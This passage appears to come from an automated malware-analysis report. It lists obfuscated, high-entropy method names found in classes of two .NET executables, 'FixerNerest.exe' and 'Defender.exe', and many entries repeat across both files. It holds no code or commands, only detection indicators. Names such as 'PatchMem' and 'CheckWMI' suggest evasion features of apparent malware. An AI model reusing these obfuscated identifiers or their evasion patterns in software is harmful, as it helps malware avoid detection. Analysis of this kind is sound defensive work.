                  Source: FixerNerest.exe.0.dr, JMLcPxDFGCfojQLRgfkS.csHigh entropy of concatenated method names: 'TgKyLZaRtKtJzsQ', 'gtWFAthDVcgaJGHLH', 'qfBeDYcoNslfkY', 'sAmOMSZyGciszHmCiBjBkXBp', 'dMgpRqsIfRFVxvxRguBVfdgap', 'eAWKUyxQjGt', 'plqkTqghkFlk', 'dAUSzfFAOMr', 'VxHYgLrXXFQevJqtISYPm', 'qydykanIaYy'
                  Source: FixerNerest.exe.0.dr, UhBFJdricqufqaojV.csHigh entropy of concatenated method names: 'ZluADFKYEZvUcgzYxWc', 'LcxxXJKzdEkHCbwweT', 'vvkYRmHNOfRcRHuSwnw', 'tuLvAonSBjDtdtggbE', 'KQwwTLbTAIJAIiqjBko', 'dzpMecXzYbNqsHlMx', 'rjYVnKsjuLmJewmfCLajSqncv', 'uSHBwemDsEzHLfUuh', 'MOwREMFalOfBw', 'aOQZctOIXaEhguzvPXIaPgcc'
                  Source: FixerNerest.exe.0.dr, prnQkWxyXENbjeKZECPLhTnn.csHigh entropy of concatenated method names: 'RauDLZwfTJkJZrHXrU', 'ZSRKucRvGrMVEzoSwCuMeRv', 'UaPeKInqzwNJAP', 'btdqnHofJl', 'KVwHLIWBqTMnlxDVV', 'meRgBTSBbIIf', 'GtlxSurkFnzZhPGssjlSXXHH', 'TcpKhOsKXFtAAlbeXgr', 'GUELIiYWMYjldTz', 'CaYZGPJJMrryKoz'
                  Source: FixerNerest.exe.0.dr, ISaCjfIATBL.csHigh entropy of concatenated method names: 'gQsGvyIMyhFUMUyq', 'HdBWAJnBgCIBRMzoDmeHq', 'sdcEaNFqOgRPMYKzgHF', 'OwAKgUGgIiT', 'valXtviawqnbjCAadEFX', 'mRvdSXFGZh', 'NjTlnnGkYfHXIYaeUfC', 'cwgJIpuaYcT', 'JHOAjOnqxVyWeumEr', 'lbXcDRCKcxtfMwMkOAKauGs'
                  Source: FixerNerest.exe.0.dr, WVihDmlAmRFUAdyEhT.csHigh entropy of concatenated method names: 'lcXdxSUGGnfVPqVnN', 'dNfzaclAov', 'DKYDOEzzsl', 'jfeNHvpeeqlEDF', 'mCurxeYGDcGRBlWnUOOdzUN', 'qLKRJRGUxVSxFBok', 'ZbkBdnsICRppc', 'SoYAmUHwmWlTgTYiTaeSatd', 'MXRIHAQfVczIgABQ', 'dpNPKHYjTxO'
                  Source: FixerNerest.exe.0.dr, MWYDrsjTSJqoS.csHigh entropy of concatenated method names: 'qsTFEGzLlzHCnRKh', 'kVZucnSXyOYrEpBhFA', 'TrOFMAkZvpESJk', 'GTtYNEBhFsaThJGUiRwN', 'VQMtsNXiuwPGVjiogmJS', 'INmgCPpUWBMXA', 'DheVqezLvLMMaYgBemvYM', 'aMpyiNYvCj', 'yeGBRSoKxRaUppQo', 'WabbYAGRfsvlnzId'
                  Source: FixerNerest.exe.0.dr, TJTvwBaIBQS.csHigh entropy of concatenated method names: 'fwlmloNajoHIlHgMA', 'HXgWEcAWhAJvnIgLMZ', 'mxTiaUeBKKoUNIaIvrIrJm', 'GMQoBycZvHXNeo', 'FCaapLtfwmNzkTEhgAiMWK', 'dDiktMpuvUGlFRixDNg', 'BozrFqarNvbSvWwX', 'azTGsRfeizPx', 'eyppeoDqeC', 'yhAsopjULqcNNOJXTNXrK'
                  Source: FixerNerest.exe.0.dr, lczhEUcowbNWQ.csHigh entropy of concatenated method names: 'nrEZEgZidL', 'ImHNwZvxzK', 'vnnRPpKUMKNBwpKLnJm', 'zngwhUbABSZ', 'rJwRmmQjYJyqulL', 'lOHnMHfHHqkvOJSuk', 'JmssYAtCepopBwICOnKlEkep', 'vBUVOqEGybZft', 'HuJcpSRonnLuejzrYICicz', 'hQykjCUjWVxDruIoW'
                  Source: FixerNerest.exe.0.dr, iICVrXHYKfHIpFQXbL.csHigh entropy of concatenated method names: 'rFzCejHzsNZCU', 'HSyQLGECpvftBnpvEGjQsUj', 'XmjXOKldmRh', 'RGQFHoQEXliTKwITSDynir', 'YWgneJBGjGBdypdJDEfjlDQ', 'RBRKiTuFaOriaA', 'uVfyMITKdptuiDIHUGTWd', 'rXQMwDkyujCSkNGFDFyqnVo', 'LBRGWcGeIBdHhALPa', 'uKrQSvBPCNXmEWisBvm'
                  Source: FixerNerest.exe.0.dr, uJXvYHzEhxLOfc.csHigh entropy of concatenated method names: 'SNWxJjZpddDWZAUIe', 'dlfCzIGMwkhjbfRrwqr', 'seUTuRVlaDMphkC', 'uPOOrxnoHtCXEhEeRMmzQLI', 'mVlsYsCqdaxgcdavqfMA', 'xgsziYVyCaiHfb', 'LvQPrLuekYComqIl', 'HUpottpUgsazPYwBEjvOwJCDC', 'agjiHupiALlg', 'CauKTTeVAFmhGMW'
                  Source: FixerNerest.exe.0.dr, JqoyJMwYkYeSSSLBCERtJfL.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'eiLcBLWnxSzTbooKAH', 'jdfmOziWNDFxt', 'shTrcPinsNklrCmXVRYOlwywx', 'TpJjrUFVjGVTYscvlSC', 'IfkphnZeMviWtzvseI', 'PfVTfCCtglpKgtVV', 'FTBDubJoYyZZwjRdwmwmME', 'fustWkCcYdHnKGSUEMfHE', 'UkBYhkHYicAhWJCimD'
                  Source: FixerNerest.exe.0.dr, huigHuEqBhxV.csHigh entropy of concatenated method names: 'xSzRXLdUGGB', 'ZKUsvmanhRBy', 'vZyEKNVIgqk', 'NjhhmbnhYi', 'jyFuXiXfRAOclfQwtfzt', 'jqhDsFvqNReNpOGE', 'yaILTBzHwBVeuCZ', 'PzHYqfccpDjjPvRJsagYlI', 'phwwEZLTPFYaOy', 'cTxgVQRQrAkMmUVADGj'
                  Source: FixerNerest.exe.0.dr, sDxpENeYXPsYVcYDBrZBiKvaq.csHigh entropy of concatenated method names: 'lMRPIUZJwfRESTctpRH', 'OqlcEVUlOiIWzabSHIGXy', 'gslwZGZpUeTDP', 'apKnAnvOXvErrJmgKjnCKsrI', 'NMYNeCvKgrRyTXLQRVpshPPD', 'TjQNkhxCqmbWAssIhLSUir', 'clsXBPPywVaKT', 'xvJUwdkjuRcxjADxjFc', 'obsKwmboeAaiZdjPI', 'mObsrauEgP'
                  Source: FixerNerest.exe.0.dr, WYdQIVjMOZZzFKSg.csHigh entropy of concatenated method names: 'xVmIWWPGmNsQwHeZFZzsKD', 'NuZjXgamrjtndQMzBOKVIqvS', 'vZAlToetaYNwnsa', 'aAhCTAJsZydAh', 'WzHRbHaBYuPtDryDNVjJi', 'NPyuPHLUKdMnCOpWQTkZbmn', 'xSuWkIRYEflrShrTp', 'jlhPokNqFQZ', 'ObbZxxNpjCMn', 'WcxEjbQkXCCrhdJIuCAz'
                  Source: FixerNerest.exe.0.dr, fIEdZvXcpYAipTNh.csHigh entropy of concatenated method names: 'EgSyrpMyfurJMCyrIsjumlKCY', 'AfbyDBzvzsXWnTre', 'BgSdVCqgadnKTVPaVohXhqp', 'RCFUmFQCIrJVF', 'edkScYMkfXHwReKGLKrILSw', 'tVNkCcLuVcJDnPOR', 'hXiMpnlsBfzewhMgNYHLbiDLN', 'pUGTwwZKevOKEibsAw', 'PYvxWZqGGWyTW', 'OxRliiDElDQSDUZjjhHzxCuWk'
                  Source: FixerNerest.exe.0.dr, ueHNMdjwjYBvgC.csHigh entropy of concatenated method names: 'KVvAMKuWDzYAKXvnmxTAjYSYH', 'HXDGRMJZqUXHDFzIEOodZY', 'lOxMCNlCXtXCXSwiLrkgaP', 'uOBbUEkdOjjSrTzGLFR', 'OfCbpHgcmo', 'NWjDyBlQynPJToAEOMkYbJO', 'OMZmMXIrasVwIQB', 'aoSMyWjnpCR', 'CPPDHSombzDbfX', 'bSDwyLeymqBSsclwKGsp'
                  Source: FixerNerest.exe.0.dr, VgiXrAmmXM.csHigh entropy of concatenated method names: 'RlSpcTxUImVHRJThXP', 'UFtJFrybKqoQQdWbgICKPSM', 'PAZQNYTOWgsWXcMy', 'rneUWEdvinYVFcBsZtF', 'iOmWZtklADDvEfX', 'izsvvVekutRDrdyiHfw', 'BHvdTruejdQZEVJaBJW', 'jBcfbguXFVoYj', 'ebEPcDbAAQcrzVTXhxJjtzeP', 'mxWYOospJq'
                  Source: FixerNerest.exe.0.dr, EiphzSFywDsQvfJ.csHigh entropy of concatenated method names: 'UguORtUtzui', 'dkKlBYhllU', 'PQlvpndBHrv', 'ulpsNbUzFBfoNQWBjyB', 'AZfxgyeGWsbIhFQA', 'fUKRUAOlwiYQb', 'IqbeUFrMPwNdNZW', 'HAWpDeqCfYQL', 'QGpuZSSGbwuUTFODrnoPp', 'YumPezZyvofczqYioH'
                  Source: Defender.exe.4.dr, GprCBzVajSFPhcvMz.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'WYpgNUnjwEYMhBcgWYlMeqbwj', 'NMmrnMiPoxTKxWYciysWlr', 'QuyKVUgxswZG', 'wFQLeSMeNMbPoBIdEM', 'WEVxpCMvIA', 'NYQxfchgsTfdDiXvhS', 'UokWjXaHbJRXEemyC', 'rWfvXTjrbSPRGfcjfldCgaFVG', 'bwbyQjVwqwtZQQnsv'
                  Source: Defender.exe.4.dr, AgGuxbclsJDKUXCF.csHigh entropy of concatenated method names: 'PgBtGwUrqzqNZCUoKeqOHE', 'uciUipnmdWskfbbukmD', 'bmYTGiVKsMrg', 'AGRXclBCMNqgS', 'NikFbDwDHDPNAUcuQfMZeU', 'XHABEPZhmotIb', 'GPcOxzNHOlha', 'wLTsKsYMybBrniW', 'ZGMAlKPjKgVwPtOUex', 'VTvjPDvIobXKQreofUZ'
                  Source: Defender.exe.4.dr, KxxSSIzaCTUHBCvRNLqyDXZ.csHigh entropy of concatenated method names: 'TgaEpLqydIyuWCaHNS', 'mhcftdlvvpWnmYUymhulqdVe', 'DBvKkjllbnvrAhbEPuJHUMW', 'DoZThFJLym', 'cqlKFkCKkYHlzTgbiMWYrf', 'GwJSDWdksNryOejDXSBlcvDZ', 'AeaycOxxwe', 'wRyoHoPXIUSwyJ', 'GqtQKsjSDrClPzuBRzVHFUMdo', 'fRfhhcpdIHDfTVMzuwE'
                  Source: Defender.exe.4.dr, tisnIiXyTCXvDDO.csHigh entropy of concatenated method names: 'iJnrHhQxpVf', 'afkSbpIpfAFPRx', 'noTZewWYBUkKLSu', 'nCHXoSFTOuYXiEXaKQdIWwBTE', 'ixrewXlCRNJa', 'VizKjXzqwwJAvplcqA', 'ThjHbjxAmgmKQjnHaWlSvE', 'lAieBizZaMVHvlb', 'blXMJJmtQIhLFFisO', 'xGtFwRnGMyucrWz'
                  Source: Defender.exe.4.dr, VoFTVipipkK.csHigh entropy of concatenated method names: 'VMantYKYfAnacPRV', 'DQtAcwiaBZQaoUKaKqmcuoiCw', 'VBfrFRUkmUQUsPsMs', 'uxqfdzRZesDOhrECbhuJTzFEi', 'JqyWkhvjIzjpXfagmbhXmZ', 'pnKSjfvrmxnpaaI', 'VSyjETmJOjmM', 'XKDkZJjZPMDNHwrkpzF', 'SLEoqLVAADzsiNPmkFB', 'YjGGuVxXvZYkgiL'
                  Source: Defender.exe.4.dr, LORYroboCXxqjpTmhsXqFkvZK.csHigh entropy of concatenated method names: 'ArLDvgByOLypWkkSBihjSpzIh', 'sVsaSsNtokczcRpk', 'HnrWmGmiNsaeLrDWco', 'GntGbcwzpCGPthOrUpx', 'OFrFznPcsZc', 'cJemOhQupG', 'gGchxxzjgeiQBwoGoNUHQZGnk', 'bdmZCQIHLyX', 'RftpwVtscqZ', 'bgVzgHzpwtVVwHbSIt'
                  Source: Defender.exe.4.dr, DDkXafHupjcDyMCFpVaefrMq.csHigh entropy of concatenated method names: 'qCGRdOsVhMwopUbX', 'jnSGDElovbagPMrtBj', 'BdLVjhRzGQzBzHCIZY', 'nyUdhmSpSAEunk', 'WzXRjZmEfXvZaZNDSVmwdgzei', 'ryzBWMRAkCkHopA', 'pFlNsPEwmZBoUpAtjShnEdBj', 'aoKTKgxvjqts', 'YbuDOwKdfuCrXWHN', 'LECFRbtdbtDslzGBOtFtAP'
                  Source: Defender.exe.4.dr, OLCRwsTtwxxSGZuMngxi.csHigh entropy of concatenated method names: 'STWcrGlCPAYMVdXTCakSo', 'EXEssEuclOoxwsgoE', 'hrgwYFkwWskGMPwuOyYzO', 'HnPKYYhfmOVykwrHyyHw', 'BreCYBCdhQEYAjshOhMP', 'FWkNfzCGAZsRAFwkIzWfBFx', 'akNzakQugqwUtot', 'zXhqLGzdww', 'hqkpAZTnumC', 'PJylKJbrTFUfeXGFTkj'
                  Source: Defender.exe.4.dr, nkKpBsREeeBrrJgLniKFn.csHigh entropy of concatenated method names: 'uPkrNGBgDoNjgrSgOmrox', 'tJdcdXdhIRyApvFJfLCy', 'NeIdpsHUXOypNVbNkc', 'CWfvlfBXaEHglzFgfUz', 'eWMkDzLcZdwuiYvEhiXynU', 'QQiNpHpwtlozgKuslTZ', 'xINxNDBywxBAJqvUUmWUkgDJu', 'PumplfOWiICkzlGrA', 'jnpqOZXzwFOQFDDpoHLGLWmn', 'nSkmkNsgHZHi'
                  Source: Defender.exe.4.dr, OwtFvyBkOpRRzc.csHigh entropy of concatenated method names: 'DCLFoZlKenZ', 'CgtqbJuoLKkbarxoqh', 'DPnuJlizndmPSVVyDVyqH', 'ottRkewcwTw', 'VNPmkFsKHL', 'uSFFsuTsreybuBsAE', 'LgTSRzIjQl', 'yxycUyyfZDhdaFWXlVkrEnH', 'eFcBGwJdizthAyZDtVfydDsN', 'bXOgtpKpCyPWwYcuEvaLpXmv'
                  Source: Defender.exe.4.dr, vTsoiPoBagCkfnEE.csHigh entropy of concatenated method names: 'AGXlggLTczEETmLnHvVvVfz', 'mWyAVsqBZzpXkkPmgUG', 'kxGurwXriJVUHrz', 'iLyjICeTwnCWg', 'PAZiupPEJYUySQeVQtlE', 'VVWHiSmxDuA', 'zuUuYwJudBaOK', 'OpbXJlbeueDbMWdHGeUn', 'WKarwbKbTvHxyEx', 'fkPjVAprxknRWuwu'
                  Source: Defender.exe.4.dr, ogkoRtQNRnFHYCnvNGTSgt.csHigh entropy of concatenated method names: 'oOnwkySUEoBZ', 'FbzfjIHajOZmiphQxTIvYwZdx', 'PySATXdopmGojYmgFAO', 'CIkEHUteZJBVi', 'tIIivBJtzvJ', 'kjJrrZPneGNO', 'yezOgklGffdYWEMAIJpuxjJ', 'iRcFuZmutpwXKfSL', 'DEEgSUUCmWwYUvPUe', 'OHfLGsiehHoqcrdVufF'
                  Source: Defender.exe.4.dr, kInYBznLcEoeuDSs.csHigh entropy of concatenated method names: 'yWUqFwYbPOyiIfALmotlTxK', 'HotTDfGtAOhQjefMP', 'llpcTYoSIOZGWAMxiQCEYjHEi', 'yjcHJgWWMZheVUekXsTtrgDl', 'PKKYCdkuYaEqAEsjzonPDvhZ', 'MOkoDSgqLuWMxJvwkwuZtW', 'bKrrQWsTclkpOAGVIYAoKW', 'BerTTzmzuqbJeLaPU', 'ataNUgweamBthdE', 'pNYDZUplqznqbKiJgWjdw'
                  Source: Defender.exe.4.dr, lXExsaLrgYgEOOXK.csHigh entropy of concatenated method names: 'UwIbcfQhBviOX', 'cHxslOlqBYCceRobCYTdkZ', 'sJroPreddJ', 'ExRVmvaevkZzBzsZtJvtC', 'FFjtaVzWuZ', 'tMqKgmXDGeRTJqp', 'SlThPiCsLlsVFfYpz', 'ImBOMWYqvXnlaDlyglar', 'KKyyvuBxbFb', 'ciCUDZwJZneFaLpk'
                  Source: Defender.exe.4.dr, gBeJmXXsXHezdPh.csHigh entropy of concatenated method names: 'eUDcfhQyzzyEOUmAxDQN', 'lmsKaeQoSgVylMzBA', 'ylfJmZSeDVdBZyULthLSE', 'zJhSdFcHmyx', 'RbrbzTrwbvLRHWe', 'TSqihvmVcUvMBwjeEI', 'sUSisaIcEyQLGbCoUIOk', 'pVzfXfueLgNzqmFBk', 'HYSiXLJplyIPVpYJDzSCVvNxs', 'DMQpwnjLGLEHynW'
                  Source: Defender.exe.4.dr, EwsvuuRydySCmvfwUdTl.csHigh entropy of concatenated method names: 'LvCpvdStvFLfKcjkzIm', 'OTwhHeTfhdsyCEsB', 'FyRyFitGWcSvLUVgQQryVi', 'JmLRMNcFjivuJUW', 'lDakBAkVJWRm', 'BDUXhIMuQgtuWjNQaMLtHF', 'uxPICpIqvpSiebWbMKOUWhpf', 'XFiKFsgvIZZSAJE', 'qxEEAioEkzjt', 'ZNIkqfjZfpxlmWCwJMAJM'
                  Source: Defender.exe.4.dr, QEEFRJhvySTxMB.csHigh entropy of concatenated method names: 'aDNCrkYOApwXNfzcDoeqHTo', 'oCobulrMvsWPQUkcspDQVmTP', 'qPIhKkHPTNpwwUPxjcUJjMjEB', 'SPXYCiYcDViflIPAwGugvUoSl', 'zGPegEfLRrrvL', 'YTQtPErLujPc', 'VCxaFmsjSNZp', 'zZqXIBvmIbEvDhSnLgO', 'uKIUQmISYFG', 'DlFRVWaOgWNasfBFZvGhKmi'
                  Source: Defender.exe.4.dr, jZWTVmmWOyYUMMRcqrgzxt.csHigh entropy of concatenated method names: 'ebNNwrzjWnUktguoiZGMylOI', 'MzLyzOspersHZpfP', 'CgscXvwDxaqhwt', 'EtksnlWZbuPoC', 'JjbxjihQroDOuBnCHhy', 'CfFmbefHRhIGuXnrOkM', 'foCvoYqUlZmiq', 'dedoVFDazJgwUXNwn', 'UoAOcJxCnKWrvaQXt', 'NZOHHEpsPsET'
                  Source: Defender.exe.4.dr, jDcxkJFhdsO.csHigh entropy of concatenated method names: 'ZVTlUGzgCUxzHTc', 'pLyoVESOrBkIzZvCXj', 'MjNkMsfBPGdpQhesSuawUD', 'tSVqgcZubYd', 'rcalvpCDHNMTbV', 'dIxnVJfTSqCzYpMCRmRm', 'rIfGRAwfFCOKvw', 'dlIGMIHvsqeNvLvgKjRlA', 'gDJinMnnodsaYge', 'ZHjMmPnmBUKWD'
                  Source: Defender.exe.4.dr, MtweeSvrtsEjaEHkGcqcH.csHigh entropy of concatenated method names: 'DFiwVYdhZUOx', 'YRQgkFOHierWZwABKbbd', 'prwiwWNMSkU', 'WiSpwGWsAVaqZwccgP', 'nUcjaUxnjBuPuXuCNhLNUEk', 'TQFIAukgDrh', 'uzsVyTnrFFfT', 'tOuUBXikZPJPpmpQNMD', 'mIOpqPBQtyOkldHfpMBTyX', 'jjGJgybrtcetlAFe'
                  Source: Defender.exe.4.dr, OtMRnVOsGKHl.csHigh entropy of concatenated method names: 'OaJVtSKEyPaxQqAqb', 'AYiHvMpChJPGtAijBpNMbGp', 'PelUWeNCfT', 'MqHfxgrkBosV', 'OhpLdOPujgrRaUfDv', 'batVtuKPgkWnNX', 'LFppCYRDMdKP', 'XMLhFbQvgtnuBN', 'fYvSTJOOqNtoKWgrjexs', 'YohmHMfMBuBLjYoi'
                  Source: Defender.exe.4.dr, JjNonPeEqnKrhUWFcwVNuQ.csHigh entropy of concatenated method names: 'HumVdnzFHHCRoAp', 'svjgfSSfzqHTWdUvtQGtB', 'ARrhDkeCiEmKcSLjnocHVmgf', 'dmHYXtvlxuSoyPhAxICh', 'ACkJcSRtYNlMy', 'yXeKLqZfXsupYuHYed', 'WcjXOvberZhhczpjdSyrrmVer', 'ntXmAjHObxOzPP', 'MiFqKSpjKeFflGkGFfAIh', 'EYyZNYrUdCjH'
                  Source: Defender.exe.4.dr, vFtGvLdAuIQGYPbHNoGtunigD.csHigh entropy of concatenated method names: 'BohTfzMQNzNDrnTSGfvSzctK', 'kQyFHWNDAJoSadRuICctK', 'SabgDkkwZvXjuiNKFdAzqdeAg', 'eYraQRZnxY', 'aScSDktvqiigxwzsKGo', 'bABGMFyeFKHlpgfKXhntlEpT', 'rteRYOhIcCZRWGymOqgbxrQR', 'VdTvKWLhKVLUNhvZcMeFtB', 'oHXOIsyzcMdCkONSfO', 'LkmRAIkBVfmMuUCeomICo'
                  Source: Defender.exe.4.dr, XbJdqTwlJhtvvHI.csHigh entropy of concatenated method names: 'cQQnOSFXJkniwgH', 'CtFVrLKWlIexEaFmY', 'XIDtCEWlTGfNocZTtBCm', 'QGuBFnHTjfAKNJzVJr', 'yFrEqYTCXk', 'DklHGCJsxQPSkbeDbSax', 'JAoVYBDdlljjCbQYGCxMQ', 'kjnHdLUsjxmwujwliAFPLefi', 'AOfUQdlTPQFhRYrItCmw', 'ggbUUwGBiGD'
                  Source: Defender.exe.4.dr, TpneWzinmRLNNvomkAusssN.csHigh entropy of concatenated method names: 'IuRdXCfNaLeGuJEFSv', 'zBBLzbjMHFiAa', 'LVbhFPjlxnBRhsbwpa', 'gOaHiRBnqYIrKDfincXNfcODN', 'itrkLPIDuNlOt', 'DctNpwrNCJoTRM', 'EzXtYjIvFMsiHJS', 'ZjHKDiBNRSUriwsyvlpNOUUgv', 'oBwNkEkMPjJCOVyJcFO', 'NITunVTEjEPbPXu'
                  Source: Defender.exe.4.dr, WpAqmEEzEwNIXIzRzOYiu.csHigh entropy of concatenated method names: 'xCQxqDhktAiNXUabbXDUuhnau', 'tGJXUzpZsyZoNASUCMZJk', 'rXnAeZCPPqDFKaaVgjX', 'ccBmJDCafaAkANPljUVQWcijl', 'pstggqmlDOVB', 'aXcjopSFwKplLNHcztSABNK', 'zuKyOKBQidutustuTCsh', 'uUcfJDVDApN', 'ukueUqmJZDiTO', 'GzXhyUcdEZiTEGfMhohg'
                  Source: Defender.exe.4.dr, avfHckAjbIOftjcvbDvZXrf.csHigh entropy of concatenated method names: 'YzCIvbnXWQBODZHdYFCd', 'NKwQlKHrQVjPyjchr', 'zUrIdiNsBvRASoBJKpGrKQ', 'fFvSzEqevhRCJgEhNCs', 'LZQDuOpYnbzd', 'oLDhQOoLRVSAlscGHspR', 'UGprXkORrUhn', 'UVAzxnEwuDxCIVNR', 'jKMaTENqsdZuZBlNSYH', 'IuBMMaCspOP'
                  Source: Defender.exe.4.dr, XOWrfubIFwwWSRBCkfv.csHigh entropy of concatenated method names: 'GzXbQMXAGN', 'mwxeQIuYrPpc', 'GQHFLAVEzNYYrvaTWaCrnJZ', 'mltpHDkRXfUAESpG', 'DniZGZMUFVonkExqmSZGgxv', 'HBMaaOElvzkVqvgMhVB', 'wdmaXKSzPzMGrFRFNlur', 'DrkUbzqmNZKwMhd', 'lDQvEVvmdeleaz', 'aKSslBFwKbMBaBKeYorbievL'
                  Source: Defender.exe.4.dr, NCWTJiYmOo.csHigh entropy of concatenated method names: 'fdXRNOXStt', 'qgnMDAxeooZwPsjKWKTw', 'HeaGYfIPuIRJgLpfweYojzNG', 'HZdEBIZwljCMFeUpPufH', 'jgteZfvHMIRUZRGeLtArN', 'cnSrADyUFhyuYskZbceoZalr', 'NOLEAfPZoEGMifrIrDjW', 'tOumSXNYVBCaKnpnQEC', 'UkodNsxnfhXBVBUzRSiH', 'ASCDlYsCVb'
                  Source: Defender.exe.4.dr, JfAFbFqmPAXuSFACrag.csHigh entropy of concatenated method names: 'RkDnIXrgyetV', 'sVHoXFlXRvG', 'epDDikiPXN', 'cMxDNKolHBpajsOTV', 'kzpwkehncPuKFgfxebaBXNcK', 'ApPTLUQNUnNjgcSWaiYqwwIum', 'msUXXWfxkpRTRu', 'xktSOyzIexfETCEgVhx', 'YsxQqEirdEGQdNzLPcYO', 'kpZrSLvgIwlTMEEnccKQHe'
                  Source: Defender.exe.4.dr, UACsUQnggztSoYk.csHigh entropy of concatenated method names: 'VdSINmzcYlFUDFbLWy', 'fqUxahHlBoZLppD', 'uGVDiBZTjLSdbYhvpFF', 'AgsaFAyozZPezcgFBvkeR', 'OOOdKcHeWj', 'QcOOuxhClUJvodzrcutVa', 'zRdMbqVhVDgujzRq', 'yCbfgETazKke', 'cNJvcwliVrhEyGPuuzaln', 'TzpSNJlcfkClbSkoWUFYdLub'
                  Source: Defender.exe.4.dr, fxrViPtroaCbyONKrcHijo.csHigh entropy of concatenated method names: 'cGXWrGRrNpktfJDBwyi', 'MCfobByeOtYEqSPP', 'tBkWiomOVhBoa', 'kBSSZbjvpHncU', 'gCNtoqDwxzdOsZF', 'xqoioCXzpobxMdjF', 'ViSUHzkHnEToLiJp', 'JxolcdfNDAPGjTPY', 'XrnzqqEbAxDKeGRHrTmQisEn', 'DzUADkEQRKS'
                  Source: Defender.exe.4.dr, qmajBmcCnsP.csHigh entropy of concatenated method names: '_003CCheckWMI_003Eb__4_0', 'akoWoQJegFQzWGz', 'sLLtHQapfaLkpD', 'GhBLeixaxKaECT', 'FDgyYJtcIK', 'yqNEYpdrKSVuU', 'ukOigLYWdVIEqeEMEsBU', 'HMsllbLJjkILQeYfubylc', 'swUyynxOdtAxn', 'VxvjMMtlztaAfhKQC'
                  Source: Defender.exe.4.dr, JMLcPxDFGCfojQLRgfkS.csHigh entropy of concatenated method names: 'TgKyLZaRtKtJzsQ', 'gtWFAthDVcgaJGHLH', 'qfBeDYcoNslfkY', 'sAmOMSZyGciszHmCiBjBkXBp', 'dMgpRqsIfRFVxvxRguBVfdgap', 'eAWKUyxQjGt', 'plqkTqghkFlk', 'dAUSzfFAOMr', 'VxHYgLrXXFQevJqtISYPm', 'qydykanIaYy'
                  Source: Defender.exe.4.dr, UhBFJdricqufqaojV.csHigh entropy of concatenated method names: 'ZluADFKYEZvUcgzYxWc', 'LcxxXJKzdEkHCbwweT', 'vvkYRmHNOfRcRHuSwnw', 'tuLvAonSBjDtdtggbE', 'KQwwTLbTAIJAIiqjBko', 'dzpMecXzYbNqsHlMx', 'rjYVnKsjuLmJewmfCLajSqncv', 'uSHBwemDsEzHLfUuh', 'MOwREMFalOfBw', 'aOQZctOIXaEhguzvPXIaPgcc'
                  Source: Defender.exe.4.dr, prnQkWxyXENbjeKZECPLhTnn.csHigh entropy of concatenated method names: 'RauDLZwfTJkJZrHXrU', 'ZSRKucRvGrMVEzoSwCuMeRv', 'UaPeKInqzwNJAP', 'btdqnHofJl', 'KVwHLIWBqTMnlxDVV', 'meRgBTSBbIIf', 'GtlxSurkFnzZhPGssjlSXXHH', 'TcpKhOsKXFtAAlbeXgr', 'GUELIiYWMYjldTz', 'CaYZGPJJMrryKoz'
                  Source: Defender.exe.4.dr, ISaCjfIATBL.csHigh entropy of concatenated method names: 'gQsGvyIMyhFUMUyq', 'HdBWAJnBgCIBRMzoDmeHq', 'sdcEaNFqOgRPMYKzgHF', 'OwAKgUGgIiT', 'valXtviawqnbjCAadEFX', 'mRvdSXFGZh', 'NjTlnnGkYfHXIYaeUfC', 'cwgJIpuaYcT', 'JHOAjOnqxVyWeumEr', 'lbXcDRCKcxtfMwMkOAKauGs'
                  Source: Defender.exe.4.dr, WVihDmlAmRFUAdyEhT.csHigh entropy of concatenated method names: 'lcXdxSUGGnfVPqVnN', 'dNfzaclAov', 'DKYDOEzzsl', 'jfeNHvpeeqlEDF', 'mCurxeYGDcGRBlWnUOOdzUN', 'qLKRJRGUxVSxFBok', 'ZbkBdnsICRppc', 'SoYAmUHwmWlTgTYiTaeSatd', 'MXRIHAQfVczIgABQ', 'dpNPKHYjTxO'
                  Source: Defender.exe.4.dr, MWYDrsjTSJqoS.csHigh entropy of concatenated method names: 'qsTFEGzLlzHCnRKh', 'kVZucnSXyOYrEpBhFA', 'TrOFMAkZvpESJk', 'GTtYNEBhFsaThJGUiRwN', 'VQMtsNXiuwPGVjiogmJS', 'INmgCPpUWBMXA', 'DheVqezLvLMMaYgBemvYM', 'aMpyiNYvCj', 'yeGBRSoKxRaUppQo', 'WabbYAGRfsvlnzId'
                  Source: Defender.exe.4.dr, TJTvwBaIBQS.csHigh entropy of concatenated method names: 'fwlmloNajoHIlHgMA', 'HXgWEcAWhAJvnIgLMZ', 'mxTiaUeBKKoUNIaIvrIrJm', 'GMQoBycZvHXNeo', 'FCaapLtfwmNzkTEhgAiMWK', 'dDiktMpuvUGlFRixDNg', 'BozrFqarNvbSvWwX', 'azTGsRfeizPx', 'eyppeoDqeC', 'yhAsopjULqcNNOJXTNXrK'
                  Source: Defender.exe.4.dr, lczhEUcowbNWQ.csHigh entropy of concatenated method names: 'nrEZEgZidL', 'ImHNwZvxzK', 'vnnRPpKUMKNBwpKLnJm', 'zngwhUbABSZ', 'rJwRmmQjYJyqulL', 'lOHnMHfHHqkvOJSuk', 'JmssYAtCepopBwICOnKlEkep', 'vBUVOqEGybZft', 'HuJcpSRonnLuejzrYICicz', 'hQykjCUjWVxDruIoW'
                  Source: Defender.exe.4.dr, iICVrXHYKfHIpFQXbL.csHigh entropy of concatenated method names: 'rFzCejHzsNZCU', 'HSyQLGECpvftBnpvEGjQsUj', 'XmjXOKldmRh', 'RGQFHoQEXliTKwITSDynir', 'YWgneJBGjGBdypdJDEfjlDQ', 'RBRKiTuFaOriaA', 'uVfyMITKdptuiDIHUGTWd', 'rXQMwDkyujCSkNGFDFyqnVo', 'LBRGWcGeIBdHhALPa', 'uKrQSvBPCNXmEWisBvm'
                  Source: Defender.exe.4.dr, uJXvYHzEhxLOfc.csHigh entropy of concatenated method names: 'SNWxJjZpddDWZAUIe', 'dlfCzIGMwkhjbfRrwqr', 'seUTuRVlaDMphkC', 'uPOOrxnoHtCXEhEeRMmzQLI', 'mVlsYsCqdaxgcdavqfMA', 'xgsziYVyCaiHfb', 'LvQPrLuekYComqIl', 'HUpottpUgsazPYwBEjvOwJCDC', 'agjiHupiALlg', 'CauKTTeVAFmhGMW'
